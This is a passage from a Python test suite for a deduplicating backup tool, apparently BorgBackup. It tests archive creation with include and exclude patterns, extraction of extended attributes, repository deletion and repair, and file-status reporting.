"""test when patterns exclude a parent folder, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_in('x input/x/a/foo_a', output)
self.assert_in("A input/x/b/foo_b", output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_exclude_folder_no_recurse(self):
"""test when patterns exclude a parent folder and, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n! input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_not_in('input/x/a/foo_a', output)
self.assert_not_in('input/x/a', output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_intermediate_folders_first(self):
"""test that intermediate folders appear first when patterns exclude a parent folder but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/a\n+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', '.')
# list the archive and verify that the "intermediate" folders appear before
# their contents
out = self.cmd('list', '--format', '{type} {path}{NL}', self.repository_location + '::test')
out_list = out.splitlines()
self.assert_in('d x/a', out_list)
self.assert_in('d x/b', out_list)
assert out_list.index('d x/a') < out_list.index('- x/a/foo_a')
assert out_list.index('d x/b') < out_list.index('- x/b/foo_b')
def test_create_no_cache_sync(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
create_json = json.loads(self.cmd('create', '--no-cache-sync', self.repository_location + '::test', 'input',
'--json', '--error')) # ignore experimental warning
info_json = json.loads(self.cmd('info', self.repository_location + '::test', '--json'))
create_stats = create_json['cache']['stats']
info_stats = info_json['cache']['stats']
assert create_stats == info_stats
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('create', '--no-cache-sync', self.repository_location + '::test2', 'input')
self.cmd('info', self.repository_location)
self.cmd('check', self.repository_location)
def test_extract_pattern_opt(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file_important'])
def _assert_test_caches(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['cache2', 'file1'])
self.assert_equal(sorted(os.listdir('output/input/cache2')), [CACHE_TAG_NAME])
def test_exclude_caches(self):
self._create_test_caches()
self.cmd('create', '--exclude-caches', self.repository_location + '::test', 'input')
self._assert_test_caches()
def test_recreate_exclude_caches(self):
self._create_test_caches()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-caches', self.repository_location + '::test')
self._assert_test_caches()
def _create_test_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('tagged1/.NOBACKUP')
self.create_regular_file('tagged2/00-NOBACKUP')
self.create_regular_file('tagged3/.NOBACKUP/file2', size=1024)
def _assert_test_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
def test_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP', self.repository_location + '::test', 'input')
self._assert_test_tagged()
def test_recreate_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP',
self.repository_location + '::test')
self._assert_test_tagged()
def _create_test_keep_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file0', size=1024)
self.create_regular_file('tagged1/.NOBACKUP1')
self.create_regular_file('tagged1/file1', size=1024)
self.create_regular_file('tagged2/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('tagged2/file2', size=1024)
self.create_regular_file('tagged3/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('tagged3/file3', size=1024)
self.create_regular_file('taggedall/.NOBACKUP1')
self.create_regular_file('taggedall/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('taggedall/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('taggedall/file4', size=1024)
def _assert_test_keep_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file0', 'tagged1', 'tagged2', 'tagged3', 'taggedall'])
self.assert_equal(os.listdir('output/input/tagged1'), ['.NOBACKUP1'])
self.assert_equal(os.listdir('output/input/tagged2'), ['.NOBACKUP2'])
self.assert_equal(os.listdir('output/input/tagged3'), [CACHE_TAG_NAME])
self.assert_equal(sorted(os.listdir('output/input/taggedall')),
['.NOBACKUP1', '.NOBACKUP2', CACHE_TAG_NAME, ])
def test_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test', 'input')
self._assert_test_keep_tagged()
def test_recreate_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
self._assert_test_keep_tagged()
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='Linux capabilities test, requires fakeroot >= 1.20.2')
def test_extract_capabilities(self):
fchown = os.fchown
# We need to manually patch chown to get the behaviour Linux has, since fakeroot does not
# accurately model the interaction of chown(2) and Linux capabilities, i.e. it does not remove them.
def patched_fchown(fd, uid, gid):
xattr.setxattr(fd, b'security.capability', b'', follow_symlinks=False)
fchown(fd, uid, gid)
# The capability descriptor used here is valid and taken from a /usr/bin/ping
capabilities = b'\x01\x00\x00\x02\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'security.capability', capabilities)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
with patch.object(os, 'fchown', patched_fchown):
self.cmd('extract', self.repository_location + '::test')
assert xattr.getxattr(b'input/file', b'security.capability') == capabilities
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='xattr not supported on this system or on this version of'
'fakeroot')
def test_extract_xattrs_errors(self):
def patched_setxattr_E2BIG(*args, **kwargs):
raise OSError(errno.E2BIG, 'E2BIG')
def patched_setxattr_ENOTSUP(*args, **kwargs):
raise OSError(errno.ENOTSUP, 'ENOTSUP')
def patched_setxattr_EACCES(*args, **kwargs):
raise OSError(errno.EACCES, 'EACCES')
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'user.attribute', b'value')
self.cmd('init', self.repository_location, '-e' 'none')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
input_abspath = os.path.abspath('input/file')
with patch.object(xattr, 'setxattr', patched_setxattr_E2BIG):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert '>: Value or key of extended attribute user.attribute is too big for this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_ENOTSUP):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert '>: Extended attributes are not supported on this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_EACCES):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert '>: Permission denied when setting extended attribute user.attribute\n' in out
assert os.path.isfile(input_abspath)
def test_path_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir1/dir2/file', size=1024 * 80)
with changedir('input/dir1/dir2'):
self.cmd('create', self.repository_location + '::test', '../../../input/dir1/../dir1/dir2/..')
output = self.cmd('list', self.repository_location + '::test')
self.assert_not_in('..', output)
self.assert_in(' input/dir1/dir2/file', output)
def test_exclude_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--exclude=file1', self.repository_location + '::test1', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test1')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
with changedir('input'):
self.cmd('create', '--exclude=./file1', self.repository_location + '::test2', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
self.cmd('create', '--exclude=input/./file1', self.repository_location + '::test3', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test3')
self.assert_equal(sorted(os.listdir('output/input')), ['file2'])
def test_repeated_files(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input')
def test_overwrite(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Overwriting regular files and directories should be supported
os.mkdir('output/input')
os.mkdir('output/input/file1')
os.mkdir('output/input/dir2')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
# But non-empty dirs should fail
os.unlink('output/input/file1')
os.mkdir('output/input/file1')
os.mkdir('output/input/file1/dir')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', exit_code=1)
def test_rename(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test', 'test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test.2', 'test.4')
self.cmd('extract', '--dry-run', self.repository_location + '::test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.4')
# Make sure both archives have been renamed
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 2)
self.assert_in('test.3', manifest.archives)
self.assert_in('test.4', manifest.archives)
def test_info(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = self.cmd('info', self.repository_location)
assert 'All archives:' in info_repo
info_archive = self.cmd('info', self.repository_location + '::test')
assert 'Archive name: test\n' in info_archive
info_archive = self.cmd('info', '--first', '1', self.repository_location)
assert 'Archive name: test\n' in info_archive
def test_info_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = json.loads(self.cmd('info', '--json', self.repository_location))
repository = info_repo['repository']
assert len(repository['id']) == 64
assert 'last_modified' in repository
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert info_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in info_repo['encryption']
cache = info_repo['cache']
stats = cache['stats']
assert all(isinstance(o, int) for o in stats.values())
assert all(key in stats for key in ('total_chunks', 'total_csize', 'total_size', 'total_unique_chunks', 'unique_csize', 'unique_size'))
info_archive = json.loads(self.cmd('info', '--json', self.repository_location + '::test'))
assert info_repo['repository'] == info_archive['repository']
assert info_repo['cache'] == info_archive['cache']
archives = info_archive['archives']
assert len(archives) == 1
archive = archives[0]
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
assert datetime.strptime(archive['start'], ISO_FORMAT)
assert datetime.strptime(archive['end'], ISO_FORMAT)
def test_comment(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', '--comment', 'this is the comment', self.repository_location + '::test2', 'input')
self.cmd('create', '--comment', '"deleted" comment', self.repository_location + '::test3', 'input')
self.cmd('create', '--comment', 'preserved comment', self.repository_location + '::test4', 'input')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: this is the comment' in self.cmd('info', self.repository_location + '::test2')
self.cmd('recreate', self.repository_location + '::test1', '--comment', 'added comment')
self.cmd('recreate', self.repository_location + '::test2', '--comment', 'modified comment')
self.cmd('recreate', self.repository_location + '::test3', '--comment', '')
self.cmd('recreate', self.repository_location + '::test4', '12345')
assert 'Comment: added comment' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: modified comment' in self.cmd('info', self.repository_location + '::test2')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test3')
assert 'Comment: preserved comment' in self.cmd('info', self.repository_location + '::test4')
def test_delete(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('create', self.repository_location + '::test.3', 'input')
self.cmd('create', self.repository_location + '::another_test.1', 'input')
self.cmd('create', self.repository_location + '::another_test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('delete', '--prefix', 'another_', self.repository_location)
self.cmd('delete', '--last', '1', self.repository_location)
self.cmd('delete', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
output = self.cmd('delete', '--stats', self.repository_location + '::test.2')
self.assert_in('Deleted data:', output)
# Make sure all data except the manifest has been deleted
with Repository(self.repository_path) as repository:
self.assert_equal(len(repository), 1)
def test_delete_multiple(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('create', self.repository_location + '::test3', 'input')
self.cmd('delete', self.repository_location + '::test1', 'test2')
self.cmd('extract', '--dry-run', self.repository_location + '::test3')
self.cmd('delete', self.repository_location, 'test3')
assert not self.cmd('list', self.repository_location)
def test_delete_repo(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'no'
self.cmd('delete', self.repository_location, exit_code=2)
assert os.path.exists(self.repository_path)
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
self.cmd('delete', self.repository_location)
# Make sure the repo is gone
self.assertFalse(os.path.exists(self.repository_path))
def test_delete_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
for item in archive.iter_items():
if 'chunks' in item:
first_chunk_id = item.chunks[0].id
repository.delete(first_chunk_id)
repository.commit(compact=False)
break
output = self.cmd('delete', '--force', self.repository_location + '::test')
self.assert_in('deleted archive was corrupted', output)
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_delete_double_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
id = archive.metadata.items[0]
repository.put(id, b'corrupted items metadata stream chunk')
repository.commit(compact=False)
self.cmd('delete', '--force', '--force', self.repository_location + '::test')
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_corrupted_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
output = self.cmd('check', '--show-version', self.repository_location)
self.assert_in('borgbackup version', output) # implied output even without --info given
self.assert_not_in('Starting repository check', output) # --info not given for root logger
name = sorted(os.listdir(os.path.join(self.tmpdir, 'repository', 'data', '0')), reverse=True)[1]
with open(os.path.join(self.tmpdir, 'repository', 'data', '0', name), 'r+b') as fd:
fd.seek(100)
fd.write(b'XXXX')
output = self.cmd('check', '--info', self.repository_location, exit_code=1)
self.assert_in('Starting repository check', output) # --info given for root logger
# we currently need to be able to create a lock directory inside the repo:
@pytest.mark.xfail(reason="we need to be able to create the lock directory inside the repo")
def test_readonly_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
os.system('chmod -R ugo-w ' + self.repository_path)
try:
self.cmd('extract', '--dry-run', self.repository_location + '::test')
finally:
# Restore permissions so shutil.rmtree is able to delete it
os.system('chmod -R u+w ' + self.repository_path)
@pytest.mark.skipif('BORG_TESTS_IGNORE_MODES' in os.environ, reason='modes unreliable')
def test_umask(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
mode = os.stat(self.repository_path).st_mode
self.assertEqual(stat.S_IMODE(mode), 0o700)
def test_create_dry_run(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--dry-run', self.repository_location + '::test', 'input')
# Make sure no archive has been created
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 0)
def add_unknown_feature(self, operation):
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
manifest.config[b'feature_flags'] = {operation.value.encode(): {b'mandatory': [b'unknown-feature']}}
manifest.write()
repository.commit(compact=False)
def cmd_raises_unknown_feature(self, args):
if self.FORK_DEFAULT:
self.cmd(*args, exit_code=EXIT_ERROR)
else:
with pytest.raises(MandatoryFeatureUnsupported) as excinfo:
self.cmd(*args)
assert excinfo.value.args == (['unknown-feature'],)
def test_unknown_feature_on_create(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.WRITE)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_cache_sync(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
self.add_unknown_feature(Manifest.Operation.READ)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_change_passphrase(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['key', 'change-passphrase', self.repository_location])
def test_unknown_feature_on_read(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
with changedir('output'):
self.cmd_raises_unknown_feature(['extract', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['list', self.repository_location])
self.cmd_raises_unknown_feature(['info', self.repository_location + '::test'])
def test_unknown_feature_on_rename(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['rename', self.repository_location + '::test', 'other'])
def test_unknown_feature_on_delete(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.DELETE)
# delete of an archive raises
self.cmd_raises_unknown_feature(['delete', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['prune', '--keep-daily=3', self.repository_location])
# delete of the whole repository ignores features
self.cmd('delete', self.repository_location)
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_unknown_feature_on_mount(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
os.mkdir(mountpoint)
# XXX this might hang if it doesn't raise an error
self.cmd_raises_unknown_feature(['mount', self.repository_location + '::test', mountpoint])
@pytest.mark.allow_cache_wipe
def test_unknown_mandatory_feature_in_cache(self):
if self.prefix:
path_prefix = 'ssh://__testsuite__'
else:
path_prefix = ''
print(self.cmd('init', '--encryption=repokey', self.repository_location))
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
cache.begin_txn()
cache.cache_config.mandatory_features = set(['unknown-feature'])
cache.commit()
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test', 'input')
else:
called = False
wipe_cache_safe = LocalCache.wipe_cache
def wipe_wrapper(*args):
nonlocal called
called = True
wipe_cache_safe(*args)
with patch.object(LocalCache, 'wipe_cache', wipe_wrapper):
self.cmd('create', self.repository_location + '::test', 'input')
assert called
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
assert cache.cache_config.mandatory_features == set([])
def test_progress_on(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--progress', self.repository_location + '::test4', 'input')
self.assert_in("\r", output)
def test_progress_off(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', self.repository_location + '::test5', 'input')
self.assert_not_in("\r", output)
def test_file_status(self):
"""test that various file status show expected results
clearly incomplete: only tests for the weird "unchanged" status for now"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
# should find first file as unmodified
output = self.cmd('create', '--list', self.repository_location + '::test1', 'input')
self.assert_in("U input/file1", output)
# this is expected, although surprising, for why, see:
# https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file
self.assert_in("A input/file2", output)
def test_file_status_cs_cache_mode(self):
"""test that a changed file with faked "previous" mtime still gets backed up in ctime,size cache_mode"""
self.create_regular_file('file1', contents=b'123')
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test1', 'input')
# modify file1, but cheat with the mtime (and atime) and also keep same size:
st = os.stat('input/file1')
self.create_regular_file('file1', contents=b'321')
os.utime('input/file1', ns=(st.st_atime_ns, st.st_mtime_ns))
# this mode uses ctime for change detection, so it should find file1 as modified
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test2', 'input')
self.assert_in("M input/file1", output)
def test_file_status_ms_cache_mode(self):
"""test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test1', 'input')
# change mode of file1, no content change:
st = os.stat('input/file1')
os.chmod('input/file1', st.st_mode ^ stat.S_IRWXO) # this triggers a ctime change, but mtime is unchanged
# this mode uses mtime for change detection, so it should find file1 as unmodified
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test2', 'input')
self.assert_in("U input/file1", output)
def test_file_status_rc_cache_mode(self):
"""test that files get rechunked unconditionally in rechunk,ctime cache mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test1', 'input')
# no changes here, but this mode rechunks unconditionally
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test2', 'input')
self.assert_in("A input/file1", output)
def test_file_status_excluded(self):
"""test that excluded paths are listed"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
if has_lchflags:
self.create_regular_file('file3', size=1024 * 80)
platform.set_flags(os.path.join(self.input_path, 'file3'), stat.UF_NODUMP)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
# should find second file as excluded
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test1', 'input', '--exclude', '*/file2')
self.assert_in("U input/file1", output)
self.assert_in("x input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
def test_create_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
create_info = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
# The usual keys
assert 'encryption' in create_info
assert 'repository' in create_info
assert 'cache' in create_info
assert 'last_modified' in create_info['repository']
archive = create_info['archive']
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
def test_create_topical(self):
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
# no listing by default
output = self.cmd('create', self.repository_location + '::test', 'input')
self.assert_not_in('file1', output)
# shouldn't be listed even if unchanged
output = self.cmd('create', self.repository_location + '::test0', 'input')
self.assert_not_in('file1', output)
# should list the file as unchanged
output = self.cmd('create', '--list', '--filter=U', self.repository_location + '::test1', 'input')
self.assert_in('file1', output)
# should *not* list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test2', 'input')
self.assert_not_in('file1', output)
# change the file
self.create_regular_file('file1', size=1024 * 100)
# should list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test3', 'input')
self.assert_in('file1', output)
@pytest.mark.skipif(not are_fifos_supported(), reason='FIFOs not supported')
def test_create_read_special_symlink(self):
from threading import Thread
def fifo_feeder(fifo_fn, data):
fd = os.open(fifo_fn, os.O_WRONLY)
try:
os.write(fd, data)
finally:
os.close(fd)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
data = b'foobar' * 1000
fifo_fn = os.path.join(self.input_path, 'fifo')
link_fn = os.path.join(self.input_path, 'link_fifo')
os.mkfifo(fifo_fn)
os.symlink(fifo_fn, link_fn)
t = Thread(target=fifo_feeder, args=(fifo_fn, data))
t.start()
try:
self.cmd('create', '--read-special', archive, 'input/link_fifo')
finally:
t.join()
with changedir('output'):
self.cmd('extract', archive)
fifo_fn = 'input/link_fifo'
with open(fifo_fn, 'rb') as f:
extracted_data = f.read()
assert extracted_data == data
def test_create_read_special_broken_symlink(self):
os.symlink('somewhere doesnt exist', os.path.join(self.input_path, 'link'))
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '--read-special', archive, 'input')
output = self.cmd('list', archive)
assert 'input/link -> somewhere doesnt exist' in output
# def test_cmdline_compatibility(self):
# self.create_regular_file('file1', size=1024 * 80)
# self.cmd('init', '--encryption=repokey', self.repository_location)
# self.cmd('create', self.repository_location + '::test', 'input')
# output = self.cmd('foo', self.repository_location, '--old')
